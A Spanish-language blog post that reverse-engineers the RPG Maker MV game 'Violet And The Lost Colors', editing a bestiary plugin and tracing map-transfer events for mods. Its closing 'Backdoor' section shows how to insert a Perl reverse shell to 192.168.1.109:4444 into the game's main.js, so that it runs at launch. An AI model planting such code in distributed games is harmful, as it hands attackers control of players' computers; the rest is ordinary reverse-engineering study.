<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>RE: Violet And The Lost Colors | s1s1fo&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta property="og:type" content="article">
<meta property="og:title" content="RE: Violet And The Lost Colors">
<meta property="og:url" content="https://calana2.github.io/2026/05/20/Analyzing-Violet-And-The-Lost-Colors/index.html">
<meta property="og:site_name" content="s1s1fo&#39;s Blog">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://calana2.github.io/img/avlc_img0.png">
<meta property="og:image" content="https://calana2.github.io/img/avlc_img1.png">
<meta property="og:image" content="https://calana2.github.io/img/avlc_img2.png">
<meta property="og:image" content="https://calana2.github.io/img/avlc_img3.png">
<meta property="og:image" content="https://calana2.github.io/img/avlc_img4.png">
<meta property="article:published_time" content="2026-05-20T13:43:39.000Z">
<meta property="article:modified_time" content="2026-06-10T15:57:42.257Z">
<meta property="article:author" content="s1s1fo">
<meta property="article:tag" content="game hacking">
<meta property="article:tag" content="spanish">
<meta property="article:tag" content="reverse engineering">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://calana2.github.io/img/avlc_img0.png">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">s1s1fo&#39;s Blog</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">Hacking for the love of the game.</a>
        </h2>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          
            <a class="nav-icon" target="_blank" rel="noopener" href="https://github.com/Calana2"><span class="fa fa-github"></span></a>
          
            <a class="nav-icon" href="mailto:kalcast@proton.me"><span class="fa fa-email-bulk"></span></a>
          
        
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://Calana2.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-Analyzing-Violet-And-The-Lost-Colors" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2026/05/20/Analyzing-Violet-And-The-Lost-Colors/" class="article-date">
  <time class="dt-published" datetime="2026-05-20T13:43:39.000Z" itemprop="datePublished">2026-05-20</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      RE: Violet And The Lost Colors
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <div></div>
<span id="more"></span>
<img src="/img/avlc_img0.png" height=200 width=800></img>

<p>Estaba jugando este juego indie que encontré en <a target="_blank" rel="noopener" href="https://itch.io/">itch.io</a>. Le dediqué un par de horas, lo completé y sin embargo vi que me faltaban unas dos entradas del bestiario. Curioso, porque estaba casi seguro de que lo había terminado al 100%.</p>
<p><img src="/img/avlc_img1.png"></img></p>
<p>Soy una especie de adicto a tener este tipo de “compendios” o “wikis” internas de los juegos enteramente desbloqueados. Esto sumado al hecho de que nunca había crackeado algo hecho con RPGMaker me motivó a hacer este análisis.</p>
<h1 id="Indice"><a href="#Indice" class="headerlink" title="Índice"></a>Índice</h1><ul>
<li><a href="#Introduccion">Introducción</a></li>
<li><a href="#Herramientas">Herramientas</a></li>
<li><a href="#Bestiario">Bestiario</a></li>
<li><a href="#Mods">Mods</a></li>
<li><a href="#Backdoor">Backdoor</a></li>
<li><a href="#Conclusiones">Conclusiones</a></li>
</ul>
<h2 id="Introduccion"><a href="#Introduccion" class="headerlink" title="Introducción"></a>Introducción</h2><p>El juego fue hecho con <code>RPG Maker MV/MZ</code>. Podemos saberlo por el directorio <code>www</code> y <code>www/js/plugins</code>. <code>RPG Maker MV/MZ</code> está basado en Javascript y utiliza un framework llamado <code>PixiJS</code> para los gráficos. Lo mejor de todo es que el código fuente es accesible y editable directamente en el directorio <code>/www</code>. Podemos ejecutar el juego en un navegador abriendo <code>/www/index.html</code>. Debe usarse un servidor local para evitar problemas de CORS.</p>
<h2 id="Herramientas"><a href="#Herramientas" class="headerlink" title="Herramientas"></a>Herramientas</h2><p>Es suficiente con un editor de texto y un servidor http para ejecutar el juego en el navegador en caso de que se quiera depurar. En mi caso usé el que trae el intérprete de Python por defecto. Basta con ir al directorio <code>/www</code>, ejecutar <code>python3 -m http.server</code>, abrir el navegador e ir a <code>http://localhost:8000</code>.</p>
<h2 id="Bestiario"><a href="#Bestiario" class="headerlink" title="Bestiario"></a>Bestiario</h2><p>Estuve un rato explorando <code>/www/js</code> para entender superficialmente la lógica del juego y lo más relevante que encontré fue esto:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// rpg_managers.js</span></span><br><span class="line"><span class="title class_">DataManager</span>.<span class="property">createGameObjects</span> = <span class="keyword">function</span>(<span class="params"></span>) &#123;</span><br><span class="line">    $gameTemp          = <span class="keyword">new</span> <span class="title class_">Game</span>_Temp();</span><br><span class="line">    $gameSystem        = <span class="keyword">new</span> <span class="title class_">Game</span>_System();</span><br><span class="line">    $gameScreen        = <span class="keyword">new</span> <span class="title class_">Game</span>_Screen();</span><br><span class="line">    $gameTimer         = <span class="keyword">new</span> <span class="title class_">Game</span>_Timer();</span><br><span class="line">    $gameMessage       = <span class="keyword">new</span> <span class="title class_">Game</span>_Message();</span><br><span class="line">    $gameSwitches      = <span class="keyword">new</span> <span class="title class_">Game</span>_Switches();</span><br><span class="line">    $gameVariables     = <span class="keyword">new</span> <span class="title class_">Game</span>_Variables();</span><br><span class="line">    $gameSelfSwitches  = <span class="keyword">new</span> <span class="title class_">Game</span>_SelfSwitches();</span><br><span class="line">    $gameActors        = <span class="keyword">new</span> <span class="title class_">Game</span>_Actors();</span><br><span class="line">    $gameParty         = <span class="keyword">new</span> <span class="title class_">Game</span>_Party();</span><br><span class="line">    $gameTroop         = <span class="keyword">new</span> <span class="title class_">Game</span>_Troop();</span><br><span class="line">    $gameMap           = <span class="keyword">new</span> <span class="title class_">Game</span>_Map();</span><br><span class="line">    $gamePlayer        = <span class="keyword">new</span> <span class="title class_">Game</span>_Player();</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="title class_">DataManager</span>.<span class="property">setupNewGame</span> = <span class="keyword">function</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="variable language_">this</span>.<span class="title function_">createGameObjects</span>();</span><br><span class="line">    <span class="variable language_">this</span>.<span class="title function_">selectSavefileForNewGame</span>();</span><br><span class="line">    $gameParty.<span class="title function_">setupStartingMembers</span>();</span><br><span class="line">    $gamePlayer.<span class="title function_">reserveTransfer</span>($dataSystem.<span class="property">startMapId</span>,</span><br><span class="line">        $dataSystem.<span class="property">startX</span>, $dataSystem.<span class="property">startY</span>);</span><br><span class="line">    <span class="title class_">Graphics</span>.<span class="property">frameCount</span> = <span class="number">0</span>;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>Aquí se inicializan variables para un nuevo juego, <code>$gameSystem</code> tiene alguna relación con el manejo de los enemigos pero probando algunas cosas no cambió las entradas del diario. No obstante, siguiendo a <code>createGameObjects</code> vemos que se inicializa una variable <code>$beastBook</code>:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// plugins/STV_BeastBook.js</span></span><br><span class="line">    <span class="title class_">DataManager</span>.<span class="property">createGameObjects</span> = <span class="keyword">function</span>(<span class="params"></span>) &#123;</span><br><span class="line">        STV_BeastBook_Create.<span class="title function_">call</span>(<span class="variable language_">this</span>);</span><br><span class="line">        $beastBook = <span class="keyword">new</span> <span class="title class_">Beast</span>_Book();</span><br><span class="line">    &#125;;</span><br></pre></td></tr></table></figure>

<p>El archivo contiene una sección comentada que explica los parámetros. Existen los métodos <code>completeBeasts()</code>, <code>completeItems()</code> y <code>completeKills()</code> que establecen los campos <code>discovered</code>,<code>discoveredItems</code> a <code>true</code> y el campo <code>kill</code> a <code>maxKills</code> respectivamente. Lo modificamos y bum!, tendremos toda la información disponible en una nueva partida:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">  <span class="title class_">DataManager</span>.<span class="property">createGameObjects</span> = <span class="keyword">function</span>(<span class="params"></span>) &#123;</span><br><span class="line">      STV_BeastBook_Create.<span class="title function_">call</span>(<span class="variable language_">this</span>);</span><br><span class="line">      $beastBook = <span class="keyword">new</span> <span class="title class_">Beast</span>_Book();</span><br><span class="line">$beastBook.<span class="title function_">completeBeasts</span>();</span><br><span class="line">   $beastBook.<span class="title function_">completeKills</span>();</span><br><span class="line">   $beastBook.<span class="title function_">completeBeasts</span>();</span><br><span class="line">  &#125;;</span><br></pre></td></tr></table></figure>

<p><img src="/img/avlc_img2.png"></img></p>
<p>Al final el diario queda así, parece ser un error del plugin o del manejo del mismo por parte del autor. En fin, fue divertido de todas formas.</p>
<h2 id="Mods"><a href="#Mods" class="headerlink" title="Mods"></a>Mods</h2><p>Ya que estaba en eso, también me interesé en ver como podría agregar una zona nueva al juego.</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// source: rpg_managers.js</span></span><br><span class="line"><span class="title class_">DataManager</span>.<span class="property">loadMapData</span> = <span class="keyword">function</span>(<span class="params">mapId</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span> (mapId &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">var</span> filename = <span class="string">&#x27;Map%1.json&#x27;</span>.<span class="title function_">format</span>(mapId.<span class="title function_">padZero</span>(<span class="number">3</span>));</span><br><span class="line">        <span class="variable language_">this</span>.<span class="property">_mapLoader</span> = <span class="title class_">ResourceHandler</span>.<span class="title function_">createLoader</span>(<span class="string">&#x27;data/&#x27;</span> + filename, <span class="variable language_">this</span>.<span class="property">loadDataFile</span>.<span class="title function_">bind</span>(<span class="variable language_">this</span>, <span class="string">&#x27;$dataMap&#x27;</span>, filename));</span><br><span class="line">        <span class="variable language_">this</span>.<span class="title function_">loadDataFile</span>(<span class="string">&#x27;$dataMap&#x27;</span>, filename);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="variable language_">this</span>.<span class="title function_">makeEmptyMap</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>Según estuve leyendo para pasar de un mapa al otro se hace por medio de un evento de la celda actual, el flujo es algo así:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Game_Player.updateNonmoving</span><br><span class="line">   → checkEventTriggerHere</span><br><span class="line">       → Game_Event.start()</span><br><span class="line">           → Game_Interpreter.command201                        // event TransferPlayer</span><br><span class="line">               → Game_Player.reserveTransfer     </span><br><span class="line">                   → Scene_Map.create → DataManager.loadMapData</span><br></pre></td></tr></table></figure>

<p>Busqué el evento en la celda en la que nos encontramos para pasar del mapa <code>data/Map003.json</code> a <code>data/Map001.json</code></p>
<p><img src="/img/avlc_img3.png"></img></p>
<p><code>jq &#39;.events[]&#39; ../data/Map003.json | grep -C 100 &#39;&quot;x&quot;: 0&#39;   |  grep -C 100 &#39;&quot;y&quot;: 15&#39;</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&quot;list&quot;: [</span><br><span class="line">        &#123;</span><br><span class="line">          &quot;code&quot;: 201,</span><br><span class="line">          &quot;indent&quot;: 0,</span><br><span class="line">          &quot;parameters&quot;: [</span><br><span class="line">            0,               // Direct designation    </span><br><span class="line">            1,               // new MapId</span><br><span class="line">            21,              // new x</span><br><span class="line">            16,              // new y</span><br><span class="line">            4,               // direction (left, like a numpad)</span><br><span class="line">            0                // fadeType  (black transition)</span><br><span class="line">          ]</span><br><span class="line">        &#125;,</span><br></pre></td></tr></table></figure>

<p><img src="/img/avlc_img4.png"></img></p>
<p>Estos métodos aclaran el funcionamiento del evento:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// source: plugins/SRD_GameOverCore.js</span></span><br><span class="line">_.<span class="property">specialCommand201</span> = <span class="keyword">function</span>(<span class="params"></span>) &#123;</span><br><span class="line">	<span class="keyword">if</span> (!$gameMessage.<span class="title function_">isBusy</span>()) &#123;</span><br><span class="line">		<span class="title class_">SceneManager</span>.<span class="title function_">goto</span>(<span class="title class_">Scene</span>_Map);</span><br><span class="line">		<span class="keyword">var</span> mapId, x, y;</span><br><span class="line">		<span class="keyword">if</span> (<span class="variable language_">this</span>.<span class="property">_params</span>[<span class="number">0</span>] === <span class="number">0</span>) &#123;  <span class="comment">// Direct designation</span></span><br><span class="line">			mapId = <span class="variable language_">this</span>.<span class="property">_params</span>[<span class="number">1</span>];</span><br><span class="line">			x = <span class="variable language_">this</span>.<span class="property">_params</span>[<span class="number">2</span>];</span><br><span class="line">			y = <span class="variable language_">this</span>.<span class="property">_params</span>[<span class="number">3</span>];</span><br><span class="line">		&#125; <span class="keyword">else</span> &#123;  <span class="comment">// Designation with variables</span></span><br><span class="line">			mapId = $gameVariables.<span class="title function_">value</span>(<span class="variable language_">this</span>.<span class="property">_params</span>[<span class="number">1</span>]);</span><br><span class="line">			x = $gameVariables.<span class="title function_">value</span>(<span class="variable language_">this</span>.<span class="property">_params</span>[<span class="number">2</span>]);</span><br><span class="line">			y = $gameVariables.<span class="title function_">value</span>(<span class="variable language_">this</span>.<span class="property">_params</span>[<span class="number">3</span>]);</span><br><span class="line">		&#125;</span><br><span class="line">		$gamePlayer.<span class="title function_">reserveTransfer</span>(mapId, x, y, <span class="variable language_">this</span>.<span class="property">_params</span>[<span class="number">4</span>], <span class="variable language_">this</span>.<span class="property">_params</span>[<span class="number">5</span>]);</span><br><span class="line">		<span class="variable language_">this</span>.<span class="title function_">setWaitMode</span>(<span class="string">&#x27;transfer&#x27;</span>);</span><br><span class="line">		<span class="variable language_">this</span>.<span class="property">_index</span>++;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// source: rpg_objects.js</span></span><br><span class="line">    <span class="title class_">Game</span>_Player.<span class="property"><span class="keyword">prototype</span></span>.<span class="property">reserveTransfer</span> = <span class="keyword">function</span>(<span class="params">mapId, x, y, d, fadeType</span>) &#123;</span><br><span class="line">    <span class="variable language_">this</span>.<span class="property">_transferring</span> = <span class="literal">true</span>;</span><br><span class="line">    <span class="variable language_">this</span>.<span class="property">_newMapId</span> = mapId;</span><br><span class="line">    <span class="variable language_">this</span>.<span class="property">_newX</span> = x;</span><br><span class="line">    <span class="variable language_">this</span>.<span class="property">_newY</span> = y;</span><br><span class="line">    <span class="variable language_">this</span>.<span class="property">_newDirection</span> = d;</span><br><span class="line">    <span class="variable language_">this</span>.<span class="property">_fadeType</span> = fadeType;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>Al final me dio pereza hacerlo a mano. Un método más sencillo es crear un proyecto nuevo en <code>RPGMakerMV</code> y reemplazar el código del juego del proyecto con el del juego que queremos modear y ya. Todo se hace por botones. La interfaz es intuitiva, es fácil cambiar y agregar cosas nuevas. Hay assets gratis en Internet.</p>
<h2 id="Backdoor"><a href="#Backdoor" class="headerlink" title="Backdoor"></a>Backdoor</h2><p><strong>Esto es solo por motivos de aprendizaje y no me hago responsable de su uso inadecuado.</strong></p>
<p>Estos proyectos de <code>RPGMakerMV</code> usan <code>NW.js</code> (básicamente un framework que contiene un navegador <code>Chromium</code> embebido) como motor de javascript. <code>Game.exe</code> y las DLLs en el directorio raíz se encargan de ejecutar. Este programa ejecuta todo código en <code>/www/js</code>. Por ejemplo <code>/www/js/main.js</code>:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//=============================================================================</span></span><br><span class="line"><span class="comment">// main.js</span></span><br><span class="line"><span class="comment">//=============================================================================</span></span><br><span class="line"></span><br><span class="line"><span class="title class_">PluginManager</span>.<span class="title function_">setup</span>($plugins);</span><br><span class="line"></span><br><span class="line"><span class="variable language_">window</span>.<span class="property">onload</span> = <span class="keyword">function</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="title class_">SceneManager</span>.<span class="title function_">run</span>(<span class="title class_">Scene</span>_Boot);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>Segun <a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/33458437/execute-command-using-shelljs-in-nwjs">este post</a> se puede añadir código para crear una reverse shell remota así de fácil:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> nwGui = <span class="built_in">require</span>(<span class="string">&#x27;nw.gui&#x27;</span>)</span><br><span class="line">    , child_process = <span class="built_in">require</span>(<span class="string">&#x27;child_process&#x27;</span>)</span><br><span class="line">    , exec = child_process.<span class="property">exec</span></span><br><span class="line"></span><br><span class="line"><span class="title function_">exec</span>(<span class="string">&quot;perl -e &#x27;use Socket;$i=\&quot;192.168.1.109\&quot;;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\&quot;tcp\&quot;));if(connect(S,sockaddr_in($p,inet_aton($i))))&#123;open(STDIN,\&quot;&gt;&amp;S\&quot;);open(STDOUT,\&quot;&gt;&amp;S\&quot;);open(STDERR,\&quot;&gt;&amp;S\&quot;);exec(\&quot;/bin/sh\&quot;);&#125;;&#x27;&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">//=============================================================================</span></span><br><span class="line"><span class="comment">// main.js</span></span><br><span class="line"><span class="comment">//=============================================================================</span></span><br><span class="line"></span><br><span class="line"><span class="title class_">PluginManager</span>.<span class="title function_">setup</span>($plugins);</span><br><span class="line"></span><br><span class="line"><span class="variable language_">window</span>.<span class="property">onload</span> = <span class="keyword">function</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="title class_">SceneManager</span>.<span class="title function_">run</span>(<span class="title class_">Scene</span>_Boot);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>Usé perl porque estaba en Linux, en Windows debería reemplazarse por un script de powershell. </p>
<h2 id="Conclusiones"><a href="#Conclusiones" class="headerlink" title="Conclusiones"></a>Conclusiones</h2><p>Sé que es un análisis corto pero quería escribir un artículo sobre algo nuevo que aprendí durante el proceso. Con esto ya he cubierto tanto juegos Flash (véase <em><a href="" title="RE: Kingdom Rush Frontiers">RE: Kingdom Rush Frontiers</a></em>) como de RPGMaker MV. Planeo escribir más hasta cubrir una buena cantidad de técnicas conocidas de como revertir juegos creados con diferentes motores.</p>
<p>Eso es todo.</p>
<h4 id="Enlaces"><a href="#Enlaces" class="headerlink" title="Enlaces"></a>Enlaces</h4><ul>
<li><em>Violet And The Lost Colors V1.3.1</em>, <a target="_blank" rel="noopener" href="https://daylieaf.itch.io/violet-and-the-lost-colors">https://daylieaf.itch.io/violet-and-the-lost-colors</a></li>
<li><em>RPGMaker</em>, <a target="_blank" rel="noopener" href="https://www.rpgmakerweb.com/products/rpg-maker-mz">https://www.rpgmakerweb.com/products/rpg-maker-mz</a></li>
<li><em>Chromium (web browser)</em>, <a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/Chromium_(web_browser)#Use_in_app_frameworks">https://en.wikipedia.org/wiki/Chromium_(web_browser)#Use_in_app_frameworks</a></li>
<li><em>Execute command using shelljs in nwjs?</em>, <a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/33458437/execute-command-using-shelljs-in-nwjs">https://stackoverflow.com/questions/33458437/execute-command-using-shelljs-in-nwjs</a></li>
</ul>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://calana2.github.io/2026/05/20/Analyzing-Violet-And-The-Lost-Colors/" data-id="cmq88wdm70000wdi5hdk54lbb" data-title="RE: Violet And The Lost Colors" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/game-hacking/" rel="tag">game hacking</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/reverse-engineering/" rel="tag">reverse engineering</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/spanish/" rel="tag">spanish</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2026/06/03/Decompiling-Stardew-Valley/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          RE: Stardew Valley
        
      </div>
    </a>
  
  
    <a href="/2026/05/04/pwnable-kr-Rookiss/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">pwnable.kr series (2) - Rookiss</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">avatar</h3>
    <div class="widget" style="display: flex; justify-content: center; align-items: center; padding: 10px;">
     <img src="/images/avatar.png" style="width: 90%; height: 30%; object-fit: cover; display: block;"/>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/binary-exploitation/" rel="tag">binary exploitation</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/english/" rel="tag">english</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/game-hacking/" rel="tag">game hacking</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/reverse-engineering/" rel="tag">reverse engineering</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/spanish/" rel="tag">spanish</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wargame/" rel="tag">wargame</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/binary-exploitation/" style="font-size: 13.33px;">binary exploitation</a> <a href="/tags/english/" style="font-size: 10px;">english</a> <a href="/tags/game-hacking/" style="font-size: 16.67px;">game hacking</a> <a href="/tags/reverse-engineering/" style="font-size: 16.67px;">reverse engineering</a> <a href="/tags/spanish/" style="font-size: 20px;">spanish</a> <a href="/tags/wargame/" style="font-size: 13.33px;">wargame</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2026/06/">June 2026</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2026/05/">May 2026</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2026/02/">February 2026</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/09/">September 2025</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/08/">August 2025</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2026/06/03/Decompiling-Stardew-Valley/">RE: Stardew Valley</a>
          </li>
        
          <li>
            <a href="/2026/05/20/Analyzing-Violet-And-The-Lost-Colors/">RE: Violet And The Lost Colors</a>
          </li>
        
          <li>
            <a href="/2026/05/04/pwnable-kr-Rookiss/">pwnable.kr series (2) - Rookiss</a>
          </li>
        
          <li>
            <a href="/2026/02/24/pwnable-kr-Toddler-s-Bottle/">pwnable.kr series (1) - Toddler&#39;s Bottle</a>
          </li>
        
          <li>
            <a href="/2025/09/05/Hacking-Kingdom-Rush-es/">RE: Kingdom Rush Frontiers</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2026 s1s1fo<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>